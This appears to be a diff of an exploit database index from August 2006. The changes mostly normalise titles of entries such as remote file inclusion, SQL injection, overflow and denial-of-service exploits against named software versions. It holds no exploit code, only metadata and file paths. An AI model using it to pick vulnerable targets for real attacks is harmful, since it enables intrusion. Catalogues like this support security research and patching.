+2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - (abs_path) Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 -2122,platforms/php/webapps/2122.txt,"ME Download System <= 1.3 - (header.php) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 +2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - (header.php) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote Include",2006-08-07,SirDarckCat,php,webapps,0 -2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0 -2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component <= 1.0.2 - Remote Include",2006-08-07,jank0,php,webapps,0 -2127,platforms/php/webapps/2127.txt,"Modernbill <= 1.6 - (config.php) Remote File Include",2006-08-07,Solpot,php,webapps,0 -2128,platforms/php/webapps/2128.txt,"SAPID CMS <= 1.2.3.05 - (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 -2129,platforms/php/webapps/2129.txt,"SAPID Blog <= beta 2 - (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 -2130,platforms/php/webapps/2130.txt,"SAPID Gallery <= 1.0 - (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 -2131,platforms/php/webapps/2131.txt,"SAPID Shop <= 1.2 - (root_path) Remote File Include",2006-08-07,Kacper,php,webapps,0 -2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea <= 3.2.5 - (installed_config_file) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 +2124,platforms/windows/dos/2124.php,"XChat 2.6.7 - (Windows) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0 +2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component 1.0.2 - Remote Include",2006-08-07,jank0,php,webapps,0 +2127,platforms/php/webapps/2127.txt,"Modernbill 1.6 - (config.php) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 +2128,platforms/php/webapps/2128.txt,"SAPID CMS 1.2.3.05 - (root_path) Remote File Inclusion Vulnerabilities",2006-08-07,Kacper,php,webapps,0 +2129,platforms/php/webapps/2129.txt,"SAPID Blog beta 2 - (root_path) Remote File Inclusion Vulnerabilities",2006-08-07,Kacper,php,webapps,0 +2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion Vulnerabilities",2006-08-07,Kacper,php,webapps,0 +2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 +2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - (installed_config_file) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2133,platforms/php/webapps/2133.txt,"Simple CMS Administrator Authentication Bypass",2006-08-07,daaan,php,webapps,0 2134,platforms/php/webapps/2134.txt,"phpCC 4.2 beta (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - (abs_path) Remote File Inclusion Vulnerabilities",2006-08-07,"Philipp Niedziela",php,webapps,0 -2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 -2137,platforms/php/webapps/2137.txt,"QuestCMS (main.php) Remote File Include",2006-08-07,Crackers_Child,php,webapps,0 -2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - Remote SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0 -2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet <= 0.5 - (Core.php) Remote File Include",2006-08-07,Minion,php,webapps,0 +2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 +2137,platforms/php/webapps/2137.txt,"QuestCMS (main.php) Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps,0 +2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0 +2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion",2006-08-07,Minion,php,webapps,0 2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit) (2)",2006-08-07,ri0t,windows,remote,10616 2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote Include",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 -2143,platforms/php/webapps/2143.pl,"TWiki <= 4.0.4 - (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 -2144,platforms/linux/local/2144.sh,"liblesstif <= 2-0.93.94-4mdk - (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0 -2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 -2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 - (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0 -2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0 -2148,platforms/php/webapps/2148.txt,"phNNTP <= 1.3 - (article-raw.php) Remote File Include",2006-08-08,Drago84,php,webapps,0 -2149,platforms/php/webapps/2149.txt,"Hitweb <= 4.2.1 - (REP_INC) Remote File Include",2006-08-08,Drago84,php,webapps,0 +2143,platforms/php/webapps/2143.pl,"TWiki 4.0.4 - (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 +2144,platforms/linux/local/2144.sh,"liblesstif 2-0.93.94-4mdk - (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0 +2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 +2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0 +2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 - (Windows) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0 +2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0 +2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - (REP_INC) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0 2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0 -2151,platforms/php/webapps/2151.txt,"Cwfm <= 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,0 -2152,platforms/php/webapps/2152.php,"PHP <= 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow Exploit PoC",2006-08-08,Heintz,php,webapps,0 -2153,platforms/php/webapps/2153.txt,"Boite de News <= 4.0.1 - (index.php) Remote File Inclusion",2006-08-09,"the master",php,webapps,0 -2154,platforms/php/webapps/2154.txt,"PgMarket <= 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 -2155,platforms/php/webapps/2155.txt,"See-Commerce <= 1.0.625 - (owimg.php3) Remote Include",2006-08-09,Drago84,php,webapps,0 +2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,0 +2152,platforms/php/webapps/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow Exploit PoC",2006-08-08,Heintz,php,webapps,0 +2153,platforms/php/webapps/2153.txt,"Boite de News 4.0.1 - (index.php) Remote File Inclusion",2006-08-09,"the master",php,webapps,0 +2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 +2155,platforms/php/webapps/2155.txt,"See-Commerce 1.0.625 - (owimg.php3) Remote Include",2006-08-09,Drago84,php,webapps,0 2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer (WAPPush) Denial of Service Exploit",2006-08-09,"Collin Mulliner",hardware,dos,0 -2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition (BBCodeFile) Remote File Include",2006-08-09,Morgan,php,webapps,0 -2158,platforms/php/webapps/2158.txt,"TinyWebGallery <= 1.5 - (image) Remote Include Vulnerabilities",2006-08-09,"Mehmet Ince",php,webapps,0 -2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 - (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0 -2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 - Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0 -2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 +2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition (BBCodeFile) Remote File Inclusion",2006-08-09,Morgan,php,webapps,0 +2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote Include Vulnerabilities",2006-08-09,"Mehmet Ince",php,webapps,0 +2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection Exploit",2006-08-09,simo64,php,webapps,0 +2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0 +2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445 -2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 - (spaw) Remote File Include",2006-08-10,Morgan,php,webapps,0 +2163,platforms/php/webapps/2163.txt,"phpwcms 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,0 2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 -2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 - (page) Remote File Include",2006-08-10,Drago84,php,webapps,0 -2166,platforms/php/webapps/2166.txt,"Thatware <= 0.4.6 - (root_path) Remote File Include",2006-08-10,Drago84,php,webapps,0 -2167,platforms/php/webapps/2167.txt,"SaveWebPortal <= 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 -2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer <= 1.2 - Remote File Include",2006-08-10,Cmaster4,php,webapps,0 -2169,platforms/php/webapps/2169.txt,"Chaussette <= 080706 - (_BASE) Remote File Include Vulnerabilities",2006-08-10,Drago84,php,webapps,0 -2170,platforms/php/webapps/2170.txt,"VWar <= 1.50 R14 - (online.php) Remote SQL Injection",2006-08-10,brOmstar,php,webapps,0 -2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e (cabsolute_path) Remote File Include",2006-08-10,"Philipp Niedziela",php,webapps,0 -2172,platforms/php/webapps/2172.txt,"Mambo Remository Component <= 3.25 - Remote Include",2006-08-10,camino,php,webapps,0 -2173,platforms/php/webapps/2173.txt,"MVCnPHP <= 3.0 - glConf[path_libraries] Remote Include Vulnerabilities",2006-08-10,Drago84,php,webapps,0 -2174,platforms/php/webapps/2174.txt,"Wheatblog <= 1.1 - (session.php) Remote File Include",2006-08-11,O.U.T.L.A.W,php,webapps,0 -2175,platforms/php/webapps/2175.txt,"WEBinsta CMS <= 0.3.1 - (templates_dir) Remote File Include Exploit",2006-08-12,K-159,php,webapps,0 +2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 +2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - (root_path) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 +2167,platforms/php/webapps/2167.txt,"SaveWebPortal 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 +2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,0 +2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion Vulnerabilities",2006-08-10,Drago84,php,webapps,0 +2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - (online.php) SQL Injection",2006-08-10,brOmstar,php,webapps,0 +2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e (cabsolute_path) Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 +2172,platforms/php/webapps/2172.txt,"Mambo Remository Component 3.25 - Remote Include",2006-08-10,camino,php,webapps,0 +2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote Include Vulnerabilities",2006-08-10,Drago84,php,webapps,0 +2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,0 +2175,platforms/php/webapps/2175.txt,"WEBinsta CMS 0.3.1 - (templates_dir) Remote File Inclusion Exploit",2006-08-12,K-159,php,webapps,0 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 -2177,platforms/php/webapps/2177.txt,"Joomla Webring Component <= 1.0 - Remote Include",2006-08-13,"Mehmet Ince",php,webapps,0 -2178,platforms/php/webapps/2178.php,"XMB <= 1.9.6 Final basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0 +2177,platforms/php/webapps/2177.txt,"Joomla Webring Component 1.0 - Remote Include",2006-08-13,"Mehmet Ince",php,webapps,0 +2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service Exploit",2006-08-13,Preddy,multiple,dos,0 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service Exploit (Python)",2006-08-13,Preddy,multiple,dos,0 -2181,platforms/php/webapps/2181.pl,"phPay <= 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,0 -2182,platforms/php/webapps/2182.txt,"Mambo mmp Component <= 1.2 - Remote File Include",2006-08-14,mdx,php,webapps,0 -2183,platforms/php/webapps/2183.txt,"ProjectButler <= 0.8.4 - (rootdir) Remote File Include Vulnerabilities",2006-08-14,"the master",php,webapps,0 -2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Include",2006-08-14,Matdhule,php,webapps,0 +2181,platforms/php/webapps/2181.pl,"phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,0 +2182,platforms/php/webapps/2182.txt,"Mambo mmp Component 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0 +2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion Vulnerabilities",2006-08-14,"the master",php,webapps,0 +2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0 2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow Exploit (3)",2006-08-14,K-sPecial,linux,remote,110 -2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script <= 1.5 - (tr) Remote SQL Injection",2006-08-14,ASIANEAGLE,asp,webapps,0 -2187,platforms/php/webapps/2187.htm,"WEBInsta MM <= 1.3e (absolute_path) Remote File Include Exploit",2006-08-15,str0ke,php,webapps,0 -2188,platforms/php/webapps/2188.txt,"Discloser <= 0.0.4 - (fileloc) Remote File Include Vulnerabilities",2006-08-15,"Arash RJ",php,webapps,0 -2189,platforms/php/webapps/2189.txt,"WEBInsta CMS <= 0.3.1 - (users.php) Remote File Include",2006-08-15,Yns,php,webapps,0 -2190,platforms/php/webapps/2190.txt,"PHProjekt <= 5.1 - Multiple Remote File Include Vulnerabilities",2006-08-15,Kacper,php,webapps,0 -2191,platforms/php/webapps/2191.txt,"dotProject <= 2.0.4 - (baseDir) Remote File Include",2006-08-16,Kacper,php,webapps,0 -2192,platforms/php/webapps/2192.txt,"OPT Max <= 1.2.0 - (CRM_inc) Remote File Include",2006-08-16,Kacper,php,webapps,0 -2193,platforms/linux/local/2193.php,"PHP <= 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow Exploit",2006-08-16,Andi,linux,local,0 +2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script 1.5 - (tr) SQL Injection",2006-08-14,ASIANEAGLE,asp,webapps,0 +2187,platforms/php/webapps/2187.htm,"WEBInsta MM 1.3e (absolute_path) Remote File Inclusion Exploit",2006-08-15,str0ke,php,webapps,0 +2188,platforms/php/webapps/2188.txt,"Discloser 0.0.4 - (fileloc) Remote File Inclusion Vulnerabilities",2006-08-15,"Arash RJ",php,webapps,0 +2189,platforms/php/webapps/2189.txt,"WEBInsta CMS 0.3.1 - (users.php) Remote File Inclusion",2006-08-15,Yns,php,webapps,0 +2190,platforms/php/webapps/2190.txt,"PHProjekt 5.1 - Multiple Remote File Inclusion Vulnerabilities",2006-08-15,Kacper,php,webapps,0 +2191,platforms/php/webapps/2191.txt,"dotProject 2.0.4 - (baseDir) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 +2192,platforms/php/webapps/2192.txt,"OPT Max 1.2.0 - (CRM_inc) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 +2193,platforms/linux/local/2193.php,"PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow Exploit",2006-08-16,Andi,linux,local,0 2194,platforms/windows/dos/2194.pl,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component Remote Include",2006-08-16,k1tk4t,php,webapps,0 -2198,platforms/php/webapps/2198.php,"CubeCart <= 3.0.11 - (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0 -2199,platforms/php/webapps/2199.txt,"IRSR <= 0.2 - (_sysSessionPath) Remote File Include",2006-08-17,Kacper,php,webapps,0 -2200,platforms/php/webapps/2200.txt,"WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection",2006-08-17,sh1r081,php,webapps,0 -2201,platforms/php/webapps/2201.txt,"POWERGAP <= 2003 - (s0x.php) Remote File Include",2006-08-17,"Saudi Hackrz",php,webapps,0 -2202,platforms/php/webapps/2202.txt,"Mambo mambelfish Component <= 1.1 - Remote File Include",2006-08-17,mdx,php,webapps,0 -2203,platforms/php/webapps/2203.txt,"Joomla com_jim Component <= 1.0.1 - Remote File Include",2006-08-17,"Mehmet Ince",php,webapps,0 +2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0 +2199,platforms/php/webapps/2199.txt,"IRSR 0.2 - (_sysSessionPath) Remote File Inclusion",2006-08-17,Kacper,php,webapps,0 +2200,platforms/php/webapps/2200.txt,"WTcom 0.2.4-alpha (torrents.php) SQL Injection",2006-08-17,sh1r081,php,webapps,0 +2201,platforms/php/webapps/2201.txt,"POWERGAP 2003 - (s0x.php) Remote File Inclusion",2006-08-17,"Saudi Hackrz",php,webapps,0 +2202,platforms/php/webapps/2202.txt,"Mambo mambelfish Component 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps,0 +2203,platforms/php/webapps/2203.txt,"Joomla com_jim Component 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",php,webapps,0 2204,platforms/windows/dos/2204.c,"Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (1)",2006-08-17,Preddy,windows,dos,0 -2205,platforms/php/webapps/2205.txt,"Joomla Mosets Tree <= 1.0 - Remote File Include",2006-08-17,Crackers_Child,php,webapps,0 -2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component <= 1.2 RC2b File Include",2006-08-17,Cmaster4,php,webapps,0 +2205,platforms/php/webapps/2205.txt,"Joomla Mosets Tree 1.0 - Remote File Inclusion",2006-08-17,Crackers_Child,php,webapps,0 +2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component 1.2 RC2b File Include",2006-08-17,Cmaster4,php,webapps,0 2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 File Include",2006-08-17,Cmaster4,php,webapps,0 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0 -2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component <= 1.0b4 - Remote Include",2006-08-18,camino,php,webapps,0 +2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component 1.0b4 - Remote Include",2006-08-18,camino,php,webapps,0 2210,platforms/windows/dos/2210.c,"Microsoft Windows - PNG File IHDR Block Denial of Service Exploit PoC (2)",2006-08-18,vegas78,windows,dos,0 -2211,platforms/php/webapps/2211.txt,"PHlyMail Lite <= 3.4.4 - (mod.listmail.php) Remote Include",2006-08-18,Kacper,php,webapps,0 -2212,platforms/php/webapps/2212.txt,"phpCodeGenie <= 3.0.2 - (BEAUT_PATH) Remote File Include",2006-08-18,Kacper,php,webapps,0 -2213,platforms/php/webapps/2213.txt,"Mambo MamboWiki Component <= 0.9.6 - Remote Include",2006-08-18,camino,php,webapps,0 -2214,platforms/php/webapps/2214.txt,"Joomla Link Directory Component <= 1.0.3 - Remote Include",2006-08-18,camino,php,webapps,0 -2215,platforms/php/webapps/2215.txt,"Joomla Kochsuite Component <= 0.9.4 - Remote File Include",2006-08-18,camino,php,webapps,0 -2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook <= 0.2 - (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0 -2217,platforms/php/webapps/2217.txt,"Mambo cropimage Component <= 1.0 - Remote File Include",2006-08-19,"Mehmet Ince",php,webapps,0 -2218,platforms/php/webapps/2218.txt,"interact <= 2.2 - (CONFIG[BASE_PATH]) Remote File Include",2006-08-19,Kacper,php,webapps,0 -2219,platforms/php/webapps/2219.php,"Joomla <= 1.0.10 - (poll component) Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 -2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 - (TNLIB_DIR) Remote File Include",2006-08-19,SHiKaA,php,webapps,0 -2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 - (script_path) Remote File Include",2006-08-19,SHiKaA,php,webapps,0 -2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include",2006-08-19,mdx,php,webapps,0 +2211,platforms/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote Include",2006-08-18,Kacper,php,webapps,0 +2212,platforms/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - (BEAUT_PATH) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 +2213,platforms/php/webapps/2213.txt,"Mambo MamboWiki Component 0.9.6 - Remote Include",2006-08-18,camino,php,webapps,0 +2214,platforms/php/webapps/2214.txt,"Joomla Link Directory Component 1.0.3 - Remote Include",2006-08-18,camino,php,webapps,0 +2215,platforms/php/webapps/2215.txt,"Joomla Kochsuite Component 0.9.4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 +2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0 +2217,platforms/php/webapps/2217.txt,"Mambo cropimage Component 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps,0 +2218,platforms/php/webapps/2218.txt,"interact 2.2 - (CONFIG[BASE_PATH]) Remote File Inclusion",2006-08-19,Kacper,php,webapps,0 +2219,platforms/php/webapps/2219.php,"Joomla 1.0.10 - (poll component) Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 +2220,platforms/php/webapps/2220.txt,"Tutti Nova 1.6 - (TNLIB_DIR) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 +2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 +2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component 0.6b Include",2006-08-19,mdx,php,webapps,0 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 -2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 - (adminlog) Remote File Incude",2006-08-19,SHiKaA,php,webapps,0 -2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component <= 1.1 File Include",2006-08-19,mdx,php,webapps,0 -2226,platforms/php/webapps/2226.txt,"NES Game and NES System <= c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0 -2227,platforms/php/webapps/2227.txt,"SportsPHool <= 1.0 - (mainnav) Remote File Include",2006-08-20,Kacper,php,webapps,0 -2228,platforms/asp/webapps/2228.txt,"SimpleBlog <= 2.0 - (comments.asp) Remote SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 -2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG <= 0.0.5b Remote File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0 -2230,platforms/asp/webapps/2230.txt,"LBlog <= 1.05 - (comments.asp) Remote SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 -2231,platforms/php/webapps/2231.php,"Simple Machines Forum <= 1.1 rc2 - (lngfile) Remote Exploit (windows)",2006-08-20,rgod,php,webapps,0 -2232,platforms/php/webapps/2232.pl,"SimpleBlog <= 2.0 - (comments.asp) Remote SQL Injection Exploit",2006-08-20,ASIANEAGLE,php,webapps,0 +2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - (adminlog) Remote File Incude",2006-08-19,SHiKaA,php,webapps,0 +2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component 1.1 File Include",2006-08-19,mdx,php,webapps,0 +2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0 +2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 +2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - (comments.asp) SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 +2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b Remote File Inclusion Vulnerabilities",2006-08-20,Kacper,php,webapps,0 +2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - (comments.asp) SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 +2231,platforms/php/webapps/2231.php,"Simple Machines Forum 1.1 rc2 - (lngfile) Remote Exploit (windows)",2006-08-20,rgod,php,webapps,0 +2232,platforms/php/webapps/2232.pl,"SimpleBlog 2.0 - (comments.asp) SQL Injection Exploit",2006-08-20,ASIANEAGLE,php,webapps,0 2233,platforms/windows/remote/2233.c,"WFTPD 3.23 - (SIZE) Remote Buffer Overflow Exploit",2006-08-21,h07,windows,remote,21 2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 -2235,platforms/php/webapps/2235.txt,"PHProjekt <= 6.1 - (path_pre) Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 -2236,platforms/php/webapps/2236.txt,"PHlyMail Lite <= 3.4.4 - (folderprops.php) Remote Include (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 +2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - (path_pre) Multiple Remote File Inclusion Vulnerabilities",2006-08-21,"the master",php,webapps,0 +2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - (folderprops.php) Remote Include (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow PoC",2006-08-21,"Jacobo 